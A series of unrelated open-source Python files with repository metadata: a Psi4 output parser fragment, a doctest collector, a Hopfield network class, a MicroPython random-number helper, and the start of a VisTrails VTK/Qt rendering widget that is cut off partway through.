# slightly all the atoms), a series of additional scf calculations is
# performed. Orbitals, geometries, energies, etc. for these shouln't be
# included in the parsed data.
if line.strip().startswith('Using finite-differences of gradients'):
self.set_attribute('finite_difference', True)
# This is the result of calling `print_variables()` and contains all
# current inner variables known to Psi4.
if line.strip() == "Variable Map:":
self.skip_line(inputfile, "d")
line = next(inputfile)
while line.strip():
tokens = line.split()
# Remove double quotation marks
name = " ".join(tokens[:-2])[1:-1]
value = float(tokens[-1])
if name == "CC T1 DIAGNOSTIC":
self.metadata["t1_diagnostic"] = value
line = next(inputfile)
if line[:54] == '*** Psi4 exiting successfully. Buy a developer a beer!'\
or line[:54] == '*** PSI4 exiting successfully. Buy a developer a beer!':
self.metadata['success'] = True
def _parse_mosyms_moenergies(self, inputfile, spinidx):
"""Parse molecular orbital symmetries and energies from the
'Post-Iterations' section.
"""
line = next(inputfile)
while line.strip():
for i in range(len(line.split()) // 2):
self.mosyms[spinidx].append(line.split()[i*2][-2:])
moenergy = utils.convertor(float(line.split()[i*2+1]), "hartree", "eV")
self.moenergies[spinidx].append(moenergy)
line = next(inputfile)
return
def parse_gradient(self, inputfile, skip_lines):
"""Parse the nuclear gradient section into a list of lists with shape
[natom, 3].
"""
self.skip_lines(inputfile, skip_lines)
line = next(inputfile)
gradient = []
while line.strip():
idx, x, y, z = line.split()
gradient.append((float(x), float(y), float(z)))
line = next(inputfile)
return gradient
@staticmethod
def parse_vibration(n, inputfile):
# Freq [cm^-1] 1501.9533 1501.9533 1501.9533
# Irrep
# Reduced mass [u] 1.1820 1.1820 1.1820
# Force const [mDyne/A] 1.5710 1.5710 1.5710
# Turning point v=0 [a0] 0.2604 0.2604 0.2604
# RMS dev v=0 [a0 u^1/2] 0.2002 0.2002 0.2002
# Char temp [K] 2160.9731 2160.9731 2160.9731
# ----------------------------------------------------------------------------------
# 1 C -0.00 0.01 0.13 -0.00 -0.13 0.01 -0.13 0.00 -0.00
# 2 H 0.33 -0.03 -0.38 0.02 0.60 -0.02 0.14 -0.01 -0.32
# 3 H -0.32 -0.03 -0.37 -0.01 0.60 -0.01 0.15 -0.01 0.33
# 4 H 0.02 0.32 -0.36 0.01 0.16 -0.34 0.60 -0.01 0.01
# 5 H 0.02 -0.33 -0.39 0.01 0.13 0.31 0.60 0.01 0.01
line = next(inputfile)
assert 'Freq' in line
chomp = line.split()
vibfreqs = [Psi4.parse_vibfreq(x) for x in chomp[-n:]]
line = next(inputfile)
assert 'Irrep' in line
chomp = line.split()
vibsyms = [irrep for irrep in chomp[1:]]
line = next(inputfile)
assert 'Reduced mass' in line
chomp = line.split()
vibrmasses = [utils.float(x) for x in chomp[3:]]
line = next(inputfile)
assert 'Force const' in line
chomp = line.split()
vibfconsts = [utils.float(x) for x in chomp[3:]]
line = next(inputfile)
assert 'Turning point' in line
line = next(inputfile)
assert 'RMS dev' in line
line = next(inputfile)
assert 'Char temp' in line
line = next(inputfile)
assert '---' in line
line = next(inputfile)
vibdisps = [ [] for i in range(n)]
while len(line.strip()) > 0:
chomp = line.split()
for i in range(n):
start = len(chomp) - (n - i) * 3
stop = start + 3
mode_disps = [float(c) for c in chomp[start:stop]]
vibdisps[i].append(mode_disps)
line = next(inputfile)
return vibfreqs, vibsyms, vibdisps, vibrmasses, vibfconsts
@staticmethod
def parse_vibfreq(vibfreq):
"""Imaginary frequencies are printed as '12.34i', rather than
'-12.34'.
"""
is_imag = vibfreq[-1] == 'i'
if is_imag:
return -float(vibfreq[:-1])
else:
return float(vibfreq)
|
cclib/cclib
|
cclib/parser/psi4parser.py
|
Python
|
bsd-3-clause
| 54,010
|
[
"Psi4",
"cclib"
] |
b7347e0934df28f72f9348716d3424ce77832dd3ee355e5f8fffdf68b0f9fb54
|
# coding: utf-8
"""
Secure JavaScript Login
~~~~~~~~~~~~~~~~~~~~~~~
:copyleft: 2015 by the secure-js-login team, see AUTHORS for more details.
:created: by JensDiemer.de
:license: GNU GPL v3 or above, see LICENSE for more details
"""
from __future__ import unicode_literals, print_function
import os
import doctest
import sys
import secure_js_login
SKIP_DIRS = (".settings", ".git", "dist", ".egg-info")
SKIP_FILES = ("setup.py", "test.py")
def get_all_doctests(base_path, verbose=False):
modules = []
for root, dirs, filelist in os.walk(base_path, followlinks=True):
for skip_dir in SKIP_DIRS:
if skip_dir in dirs:
dirs.remove(skip_dir) # don't visit this directories
for filename in filelist:
if not filename.endswith(".py"):
continue
if filename in SKIP_FILES:
continue
sys.path.insert(0, root)
try:
module = __import__(filename[:-3])
except ImportError as err:
if verbose:
print(
"\tDocTest import %s error %s" % (filename, err),
file=sys.stderr
)
except Exception as err:
if verbose:
print(
"\tDocTest %s error %s" % (filename, err),
file=sys.stderr
)
else:
try:
suite = doctest.DocTestSuite(module)
except ValueError: # has no docstrings
continue
test_count = suite.countTestCases()
if test_count<1:
if verbose:
print(
"\tNo DocTests in %r" % module.__name__,
file=sys.stderr
)
continue
if verbose:
file_info = module.__file__
else:
file_info = module.__name__
print(
"\t%i DocTests in %r" % (test_count,file_info),
file=sys.stderr
)
modules.append(module)
finally:
del sys.path[0]
return modules
def load_tests(loader, tests, ignore):
print("\ncollect DocTests:", file=sys.stderr)
path = os.path.abspath(os.path.dirname(secure_js_login.__file__))
modules = get_all_doctests(
base_path=path,
# verbose=True
)
for module in modules:
tests.addTests(doctest.DocTestSuite(module))
return tests
|
jedie/django-secure-js-login
|
tests/test_doctests.py
|
Python
|
gpl-3.0
| 2,713
|
[
"VisIt"
] |
c3fd224c60b6035a365e5af619373cf36d740f7336a847d89001e77a6222a96d
|
import numpy as np
import random
class HopfieldNetwork:
"""
(C) Daniel McNeela, 2016
Implements the Hopfield Network, a recurrent neural network developed by John Hopfield
circa 1982.
c.f. https://en.wikipedia.org/wiki/Hopfield_Network
"""
def __init__(self, num_neurons, activation_fn=None):
"""
Instantiates a Hopfield Network comprised of "num_neurons" neurons.
num_neurons The number of neurons in the network.
_weights The network's weight matrix.
_trainers A dictionary containing the methods available for
training the network.
_vec_activation A vectorized version of the network's activation function.
"""
self.num_neurons = num_neurons
self._weights = np.zeros((self.num_neurons, self.num_neurons), dtype=np.int_)
self._trainers = {"hebbian": self._hebbian, "storkey": self._storkey}
self._learn_modes = {"synchronous": self._synchronous, "asynchronous": self._asynchronous}
self._vec_activation = np.vectorize(self._activation)
self._train_act = np.vectorize(self._train_activation)
def weights(self):
"""
Getter method for the network's weight matrix.
"""
return self._weights
def reset(self):
"""
Resets the network's weight matrix to the matrix which is identically zero.
Useful for retraining the network from scratch after an initial round
of training has already been completed.
"""
self._weights = np.zeros((self.num_neurons, self.num_neurons), dtype=np.int_)
def train(self, patterns, method="hebbian", threshold=0, inject = lambda x, y: None):
"""
The wrapper method for the network's various training algorithms stored in
self._trainers.
patterns A list of the on which to train the network. Patterns are
bipolar vectors of the form
[random.choice([-1, 1]) for i in range(self.num_neurons)].
Example of properly formatted input for a Hopfield Network
containing three neurons:
[[-1, 1, 1], [1, -1, 1]]
method The training algorithm to be used. Defaults to "hebbian".
Look to self._trainers for a list of the available options.
threshold The threshold value for the network's activation function.
Defaults to 0.
"""
try:
return self._trainers[method](patterns, threshold, inject)
except KeyError:
print(method + " is not a valid training method.")
def learn(self, patterns, steps=None, mode="asynchronous", inject = lambda x: None):
"""
Wrapper method for self._synchronous and self._asynchronous.
To be used after training the network.
patterns The input vectors to learn
steps Number of steps to compute. Defaults to None.
Given 'patterns', learn(patterns) classifies these patterns based on those
which the network has already seen.
"""
try:
return self._learn_modes[mode](patterns, steps, inject)
except KeyError:
print(mode + " is not a valid learning mode.")
def energy(self, state):
"""
Returns the energy for any input to the network.
"""
return -0.5 * np.sum(np.multiply(np.outer(state, state), self._weights))
def _synchronous(self, patterns, steps=10):
"""
Updates all network neurons simultaneously during each iteration of the
learning process.
Faster than asynchronous updating, but convergence of the learning method
is not guaranteed.
"""
if steps:
for i in range(steps):
patterns = np.dot(patterns, self._weights)
return self._vec_activation(patterns)
else:
while True:
post_learn = self._vec_activation(np.dot(patterns, self._weights))
if np.array_equal(patterns, post_learn):
return self._vec_activation(post_learn)
patterns = post_learn
def _asynchronous(self, patterns, steps=None, inject=lambda x:None):
"""
Updates a single, randomly selected neuron during each iteration of the learning
process.
Convergence is guaranteed, but the learning is slower than when neurons are updated
in synchrony.
"""
patterns = np.array(patterns)
if steps:
for i in range(steps):
index = random.randrange(self.num_neurons)
patterns[:,index] = np.dot(self._weights[index,:], np.transpose(patterns))
return self._vec_activation(patterns)
else:
post_learn = patterns.copy()
inject(post_learn, 0)
indicies = set()
i = 1
while True:
index = random.randrange(self.num_neurons)
indicies.add(index)
post_learn[:,index] = np.dot(self._weights[index,:], np.transpose(patterns))
post_learn = self._vec_activation(post_learn)
inject(post_learn, i)
if np.array_equal(patterns, post_learn) and len(indicies) == self.num_neurons:
return self._vec_activation(post_learn)
patterns = post_learn.copy()
i += 1
def _activation(self, value, threshold=0):
"""
The network's activation function.
Defaults to the sign function.
"""
if value < threshold:
return -1
return 1
def _train_activation(self, value, threshold=0):
if value == threshold:
return value
elif value < threshold:
return -1
return 1
def _hebbian(self, patterns, threshold=0, inject= lambda x, y: None):
"""
Implements Hebbian learning.
"""
i = 1
for pattern in patterns:
prev = self._weights.copy()
self._weights += np.outer(pattern, pattern)
inject(prev, i)
i += 1
np.fill_diagonal(self._weights, 0)
self._weights = self._weights / len(patterns)
def _storkey(self, patterns):
"""
Implements Storkey learning.
"""
pass
|
robclewley/fovea
|
examples/hopfield/hopfield_network.py
|
Python
|
bsd-3-clause
| 6,549
|
[
"NEURON"
] |
2a66199c99719c2403526aee5e69bb81a038d6f5de2ffe8903fc768c3af65991
|
import time
def random():
""" Pseudo random number generator for micro python.
I make no claims about its randomness or suitability for use
Adpoted from:
NUMERICAL RECIPIES: THE ART OF SCIENTIFIC COMPUTING
THIRD EDITION
WILLIAM H. PRESS
SAUL A. TEVKOLSKY
WILLIAM T. VETTERLING
BRIAN P. FLANNERY
CAMBRIDGE UNIVERSITY PRESS
P.g. 342 - 343
"""
v = 4101842887655102017
u = time.ticks_cpu() ^ v
v = u
w = 4294957665 * (v & 0xffffffff) + (v >> 32)
v = v ^ (v >> 17)
v = v ^ (v << 31)
v = v ^ (v >> 8)
x = u ^ (u << 21)
x = x ^ (x >> 35)
x = x ^ (x << 4)
y = (x + v) ^ w
z=str(y)
y=int(z[14:])
return y*1E-14
def randint(a,b):
""" Returns random integer on the interval [a,b]
a and b must be positive integers with b > a"""
# add assertion for a and b being integers or inplace
if a < 0 and b >0:
raise ValueError
if b <= a:
raise ValueError
if a < 0 and b < 0:
raise ValueError
else:
return int( a + ((b-a)*random()) )
|
ichbinjakes/CodeExamples
|
random.py
|
Python
|
gpl-3.0
| 969
|
[
"Brian"
] |
e152d478f53bb772988d63b38fdcc34eec452689588d230289abbefd4c8978ef
|
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
################################################################################
# File QVTKViewWidget.py
# File for displaying a vtkRenderWindow in a Qt's QWidget ported from
# VTK/GUISupport/QVTK. Combine altogether to a single class: QVTKViewWidget
################################################################################
import vtk
from PyQt4 import QtCore, QtGui
import sip
from core import system
from core.modules.module_registry import get_module_registry
from packages.spreadsheet.basic_widgets import SpreadsheetCell, CellLocation
from packages.spreadsheet.spreadsheet_cell import QCellWidget, QCellToolBar
import vtkcell_rc
import gc
from gui.qt import qt_super
import core.db.action
from core.vistrail.action import Action
from core.vistrail.port import Port
from core.vistrail import module
from core.vistrail import connection
from core.vistrail.module_function import ModuleFunction
from core.vistrail.module_param import ModuleParam
from core.vistrail.location import Location
from core.modules.vistrails_module import ModuleError
import copy
################################################################################
class VTKViewCell(SpreadsheetCell):
"""
VTKViewCell is a VisTrails Module that can display vtkRenderWindow inside a cell
"""
def __init__(self):
SpreadsheetCell.__init__(self)
self.cellWidget = None
def compute(self):
""" compute() -> None
Dispatch the vtkRenderer to the actual rendering widget
"""
renderView = self.forceGetInputFromPort('SetRenderView')
if renderView==None:
raise ModuleError(self, 'A vtkRenderView input is required.')
self.cellWidget = self.displayAndWait(QVTKViewWidget, (renderView,))
AsciiToKeySymTable = ( None, None, None, None, None, None, None,
None, None,
"Tab", None, None, None, None, None, None,
None, None, None, None, None, None,
None, None, None, None, None, None,
None, None, None, None,
"space", "exclam", "quotedbl", "numbersign",
"dollar", "percent", "ampersand", "quoteright",
"parenleft", "parenright", "asterisk", "plus",
"comma", "minus", "period", "slash",
"0", "1", "2", "3", "4", "5", "6", "7",
"8", "9", "colon", "semicolon", "less", "equal",
"greater", "question",
"at", "A", "B", "C", "D", "E", "F", "G",
"H", "I", "J", "K", "L", "M", "N", "O",
"P", "Q", "R", "S", "T", "U", "V", "W",
"X", "Y", "Z", "bracketleft",
"backslash", "bracketright", "asciicircum",
"underscore",
"quoteleft", "a", "b", "c", "d", "e", "f", "g",
"h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w",
"x", "y", "z", "braceleft", "bar", "braceright",
"asciitilde", "Delete",
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None)
class QVTKViewWidget(QCellWidget):
"""
QVTKViewWidget is the actual rendering widget that can display
vtkRenderer inside a Qt QWidget
"""
def __init__(self, parent=None, f=QtCore.Qt.WindowFlags()):
""" QVTKViewWidget(parent: QWidget, f: WindowFlags) -> QVTKViewWidget
Initialize QVTKViewWidget with a toolbar with its own device
context
"""
QCellWidget.__init__(self, parent, f | QtCore.Qt.MSWindowsOwnDC)
self.interacting = None
self.mRenWin = None
self.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)
self.setAttribute(QtCore.Qt.WA_PaintOnScreen)
self.setMouseTracking(True)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding,
QtGui.QSizePolicy.Expanding))
self.toolBarType = QVTKViewWidgetToolBar
self.setAnimationEnabled(True)
def removeObserversFromInteractorStyle(self):
""" removeObserversFromInteractorStyle() -> None
Remove all python binding from interactor style observers for
safely freeing the cell
"""
iren = self.mRenWin.GetInteractor()
if iren:
style = iren.GetInteractorStyle()
style.RemoveObservers("InteractionEvent")
style.RemoveObservers("EndPickEvent")
style.RemoveObservers("CharEvent")
style.RemoveObservers("MouseWheelForwardEvent")
style.RemoveObservers("MouseWheelBackwardEvent")
def addObserversToInteractorStyle(self):
""" addObserversToInteractorStyle() -> None
Assign observer to the current interactor style
"""
iren = self.mRenWin.GetInteractor()
if iren:
style = iren.GetInteractorStyle()
style.AddObserver("InteractionEvent", self.interactionEvent)
style.AddObserver("EndPickEvent", self.interactionEvent)
style.AddObserver("CharEvent", self.charEvent)
style.AddObserver("MouseWheelForwardEvent", self.interactionEvent)
style.AddObserver("MouseWheelBackwardEvent", self.interactionEvent)
def deleteLater(self):
""" deleteLater() -> None
Make sure to free render window resource when
deallocating. Overriding PyQt deleteLater to free up
resources
"""
self.renderer_maps = {}
for ren in self.getRendererList():
self.mRenWin.RemoveRenderer(ren)
self.removeObserversFromInteractorStyle()
self.SetRenderWindow(None)
QCellWidget.deleteLater(self)
def updateContents(self, inputPorts):
""" updateContents(inputPorts: tuple)
Updates the cell contents with new vtkRenderer
"""
(renderView, ) = inputPorts
renWin = renderView.vtkInstance.GetRenderWindow()
renWin.DoubleBufferOn()
self.SetRenderWindow(renWin)
renderView.vtkInstance.ResetCamera()
self.addObserversToInteractorStyle()
# renWin = self.GetRenderWindow()
# renderers = [renderView.vtkInstance.GetRenderer()]
# iren = renWin.GetInteractor()
# Update interactor style
# self.removeObserversFromInteractorStyle()
# if renderView==None:
# if iStyle==None:
# iStyleInstance = vtk.vtkInteractorStyleTrackballCamera()
# else:
# iStyleInstance = iStyle.vtkInstance
# iren.SetInteractorStyle(iStyleInstance)
# self.addObserversToInteractorStyle()
# Capture window into history for playback
# Call this at the end to capture the image after rendering
QCellWidget.updateContents(self, inputPorts)
def GetRenderWindow(self):
""" GetRenderWindow() -> vtkRenderWindow
Return the associated vtkRenderWindow
"""
if not self.mRenWin:
win = vtk.vtkRenderWindow()
win.DoubleBufferOn()
self.SetRenderWindow(win)
del win
return self.mRenWin
def SetRenderWindow(self,w):
""" SetRenderWindow(w: vtkRenderWindow)
Set a new render window to QVTKViewWidget and initialize the
interactor as well
"""
if w == self.mRenWin:
return
if self.mRenWin:
if self.mRenWin.GetMapped():
self.mRenWin.Finalize()
self.mRenWin = w
if self.mRenWin:
self.mRenWin.Register(None)
if system.systemType=='Linux':
try:
vp = '_%s_void_p' % (hex(int(QtGui.QX11Info.display()))[2:])
except TypeError:
#This was change for PyQt4.2
if isinstance(QtGui.QX11Info.display(),QtGui.Display):
display = sip.unwrapinstance(QtGui.QX11Info.display())
vp = '_%s_void_p' % (hex(display)[2:])
self.mRenWin.SetDisplayId(vp)
if not self.mRenWin.GetMapped():
self.mRenWin.GetInteractor().Initialize()
system.XDestroyWindow(self.mRenWin.GetGenericDisplayId(),
self.mRenWin.GetGenericWindowId())
self.mRenWin.Finalize()
self.mRenWin.SetWindowInfo(str(int(self.winId())))
else:
self.mRenWin.SetWindowInfo(str(int(self.winId())))
if self.isVisible():
self.mRenWin.Start()
def GetInteractor(self):
""" GetInteractor() -> vtkInteractor
Return the vtkInteractor control this QVTKViewWidget
"""
return self.GetRenderWindow().GetInteractor()
def event(self, e):
""" event(e: QEvent) -> depends on event type
Process window and interaction events
"""
if e.type()==QtCore.QEvent.ParentAboutToChange:
if self.mRenWin:
if self.mRenWin.GetMapped():
self.mRenWin.Finalize()
else:
if e.type()==QtCore.QEvent.ParentChange:
if self.mRenWin:
self.mRenWin.SetWindowInfo(str(int(self.winId())))
if self.isVisible():
self.mRenWin.Start()
if QtCore.QObject.event(self,e):
return 1
if e.type() == QtCore.QEvent.KeyPress:
self.keyPressEvent(e)
if e.isAccepted():
return e.isAccepted()
return qt_super(QVTKViewWidget, self).event(e)
# return QtGui.QWidget.event(self,e)
# Was this right? Wasn't this supposed to be QCellWidget.event()?
def resizeWindow(self, width, height):
""" resizeWindow(width: int, height: int) -> None
Work around vtk bugs for resizing window
"""
########################################################
# VTK - BUGGGGGGGGG - GRRRRRRRRR
# This is a 'bug' in vtkWin32OpenGLRenderWindow(.cxx)
# If a render window is mapped to screen, the actual
# window size is the client area of the window in Win32.
# However, this real window size is only updated through
# vtkWin32OpenGLRenderWindow::GetSize(). So this has to
# be called here to get the cell size correctly. This
# invalidates the condition in the next SetSize().
# We can use self.mRenWin.SetSize(0,0) here but it will
# cause flickering and decrease performance!
# SetPosition(curX,curY) also works here but slower.
self.mRenWin.GetSize()
self.mRenWin.SetSize(width, height)
if self.mRenWin.GetInteractor():
self.mRenWin.GetInteractor().SetSize(width, height)
def resizeEvent(self, e):
""" resizeEvent(e: QEvent) -> None
Re-adjust the vtkRenderWindow size then QVTKViewWidget resized
"""
qt_super(QVTKViewWidget, self).resizeEvent(e)
if not self.mRenWin:
return
self.resizeWindow(self.width(), self.height())
self.mRenWin.Render()
def moveEvent(self,e):
""" moveEvent(e: QEvent) -> None
Echo the move event into vtkRenderWindow
"""
qt_super(QVTKViewWidget, self).moveEvent(e)
if not self.mRenWin:
return
self.mRenWin.SetPosition(self.x(),self.y())
def paintEvent(self, e):
""" paintEvent(e: QPaintEvent) -> None
Paint the QVTKViewWidget with vtkRenderWindow
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
if hasattr(self.mRenWin, 'UpdateGLRegion'):
self.mRenWin.UpdateGLRegion()
self.mRenWin.Render()
def SelectActiveRenderer(self,iren):
""" SelectActiveRenderer(iren: vtkRenderWindowIteractor) -> None
Only make the vtkRenderer below the mouse cursor active
"""
epos = iren.GetEventPosition()
rens = iren.GetRenderWindow().GetRenderers()
rens.InitTraversal()
for i in xrange(rens.GetNumberOfItems()):
ren = rens.GetNextItem()
ren.SetInteractive(ren.IsInViewport(epos[0], epos[1]))
def mousePressEvent(self,e):
""" mousePressEvent(e: QMouseEvent) -> None
Echo mouse event to vtkRenderWindowwInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ctrl = (e.modifiers()&QtCore.Qt.ControlModifier)
isDoubleClick = e.type()==QtCore.QEvent.MouseButtonDblClick
iren.SetEventInformationFlipY(e.x(),e.y(),
ctrl,
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0),
isDoubleClick,
None)
invoke = {QtCore.Qt.LeftButton:"LeftButtonPressEvent",
QtCore.Qt.MidButton:"MiddleButtonPressEvent",
QtCore.Qt.RightButton:"RightButtonPressEvent"}
self.SelectActiveRenderer(iren)
if ctrl:
e.ignore()
return
self.interacting = self.getActiveRenderer(iren)
if e.button() in invoke:
iren.InvokeEvent(invoke[e.button()])
def mouseMoveEvent(self,e):
""" mouseMoveEvent(e: QMouseEvent) -> None
Echo mouse event to vtkRenderWindowwInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.SetEventInformationFlipY(e.x(),e.y(),
(e.modifiers()&QtCore.Qt.ControlModifier),
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0), 0, None)
iren.InvokeEvent("MouseMoveEvent")
def enterEvent(self,e):
""" enterEvent(e: QEvent) -> None
Echo mouse event to vtkRenderWindowwInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.InvokeEvent("EnterEvent")
def leaveEvent(self,e):
""" leaveEvent(e: QEvent) -> None
Echo mouse event to vtkRenderWindowwInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.InvokeEvent("LeaveEvent")
def mouseReleaseEvent(self,e):
""" mouseReleaseEvent(e: QEvent) -> None
Echo mouse event to vtkRenderWindowwInteractor
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.SetEventInformationFlipY(e.x(),e.y(),
(e.modifiers()&QtCore.Qt.ControlModifier),
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0),0,None)
invoke = {QtCore.Qt.LeftButton:"LeftButtonReleaseEvent",
QtCore.Qt.MidButton:"MiddleButtonReleaseEvent",
QtCore.Qt.RightButton:"RightButtonReleaseEvent"}
self.interacting = None
if e.button() in invoke:
iren.InvokeEvent(invoke[e.button()])
def keyPressEvent(self,e):
""" keyPressEvent(e: QKeyEvent) -> None
Disallow 'quit' key in vtkRenderWindowwInteractor and sync the others
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ascii_key = None
if e.text().length()>0:
ascii_key = e.text().toLatin1()[0]
else:
ascii_key = chr(0)
keysym = self.ascii_to_key_sym(ord(ascii_key))
if not keysym:
keysym = self.qt_key_to_key_sym(e.key())
# Ignore 'q' or 'e' or Ctrl-anykey
ctrl = (e.modifiers()&QtCore.Qt.ControlModifier)
shift = (e.modifiers()&QtCore.Qt.ShiftModifier)
if (keysym in ['q', 'e'] or ctrl):
e.ignore()
return
iren.SetKeyEventInformation(ctrl,shift,ascii_key, e.count(), keysym)
iren.InvokeEvent("KeyPressEvent")
if ascii_key:
iren.InvokeEvent("CharEvent")
def keyReleaseEvent(self,e):
""" keyReleaseEvent(e: QKeyEvent) -> None
Disallow 'quit' key in vtkRenderWindowwInteractor and sync the others
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ascii_key = None
if e.text().length()>0:
ascii_key = e.text().toLatin1()[0]
else:
ascii_key = chr(0)
keysym = self.ascii_to_key_sym(ord(ascii_key))
if not keysym:
keysym = self.qt_key_to_key_sym(e.key())
# Ignore 'q' or 'e' or Ctrl-anykey
ctrl = (e.modifiers()&QtCore.Qt.ControlModifier)
shift = (e.modifiers()&QtCore.Qt.ShiftModifier)
if (keysym in ['q','e'] or ctrl):
e.ignore()
return
iren.SetKeyEventInformation(ctrl, shift, ascii_key, e.count(), keysym)
iren.InvokeEvent("KeyReleaseEvent")
def wheelEvent(self,e):
""" wheelEvent(e: QWheelEvent) -> None
Zoom in/out while scrolling the mouse
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
iren.SetEventInformationFlipY(e.x(),e.y(),
(e.modifiers()&QtCore.Qt.ControlModifier),
(e.modifiers()&QtCore.Qt.ShiftModifier),
chr(0),0,None)
self.SelectActiveRenderer(iren)
if e.delta()>0:
iren.InvokeEvent("MouseWheelForwardEvent")
else:
iren.InvokeEvent("MouseWheelBackwardEvent")
def focusInEvent(self,e):
""" focusInEvent(e: QFocusEvent) -> None
Ignore focus event
"""
pass
def focusOutEvent(self,e):
""" focusOutEvent(e: QFocusEvent) -> None
Ignore focus event
"""
pass
def contextMenuEvent(self,e):
""" contextMenuEvent(e: QContextMenuEvent) -> None
Make sure to get the right mouse position for the context menu
event, i.e. also the right click
"""
iren = None
if self.mRenWin:
iren = self.mRenWin.GetInteractor()
if (not iren) or (not iren.GetEnabled()):
return
ctrl = int(e.modifiers()&QtCore.Qt.ControlModifier)
shift = int(e.modifiers()&QtCore.Qt.ShiftModifier)
iren.SetEventInformationFlipY(e.x(),e.y(),ctrl,shift,chr(0),0,None)
iren.InvokeEvent("ContextMenuEvent")
def ascii_to_key_sym(self,i):
""" ascii_to_key_sym(i: int) -> str
Convert ASCII code into key name
"""
global AsciiToKeySymTable
return AsciiToKeySymTable[i]
def qt_key_to_key_sym(self,i):
""" qt_key_to_key_sym(i: QtCore.Qt.Keycode) -> str
Convert Qt key code into key name
"""
handler = {QtCore.Qt.Key_Backspace:"BackSpace",
QtCore.Qt.Key_Tab:"Tab",
QtCore.Qt.Key_Backtab:"Tab",
QtCore.Qt.Key_Return:"Return",
QtCore.Qt.Key_Enter:"Return",
QtCore.Qt.Key_Shift:"Shift_L",
QtCore.Qt.Key_Control:"Control_L",
QtCore.Qt.Key_Alt:"Alt_L",
QtCore.Qt.Key_Pause:"Pause",
QtCore.Qt.Key_CapsLock:"Caps_Lock",
QtCore.Qt.Key_Escape:"Escape",
QtCore.Qt.Key_Space:"space",
QtCore.Qt.Key_End:"End",
QtCore.Qt.Key_Home:"Home",
QtCore.Qt.Key_Left:"Left",
QtCore.Qt.Key_Up:"Up",
QtCore.Qt.Key_Right:"Right",
QtCore.Qt.Key_Down:"Down",
QtCore.Qt.Key_SysReq:"Snapshot",
QtCore.Qt.Key_Insert:"Insert",
QtCore.Qt.Key_Delete:"Delete",
QtCore.Qt.Key_Help:"Help",
QtCore.Qt.Key_0:"0",
QtCore.Qt.Key_1:"1",
QtCore.Qt.Key_2:"2",
QtCore.Qt.Key_3:"3",
QtCore.Qt.Key_4:"4",
QtCore.Qt.Key_5:"5",
QtCore.Qt.Key_6:"6",
QtCore.Qt.Key_7:"7",
QtCore.Qt.Key_8:"8",
QtCore.Qt.Key_9:"9",
QtCore.Qt.Key_A:"a",
QtCore.Qt.Key_B:"b",
QtCore.Qt.Key_C:"c",
QtCore.Qt.Key_D:"d",
QtCore.Qt.Key_E:"e",
QtCore.Qt.Key_F:"f",
QtCore.Qt.Key_G:"g",
QtCore.Qt.Key_H:"h",
QtCore.Qt.Key_I:"i",
QtCore.Qt.Key_J:"h",
QtCore.Qt.Key_K:"k",
QtCore.Qt.Key_L:"l",
QtCore.Qt.Key_M:"m",
QtCore.Qt.Key_N:"n",
QtCore.Qt.Key_O:"o",
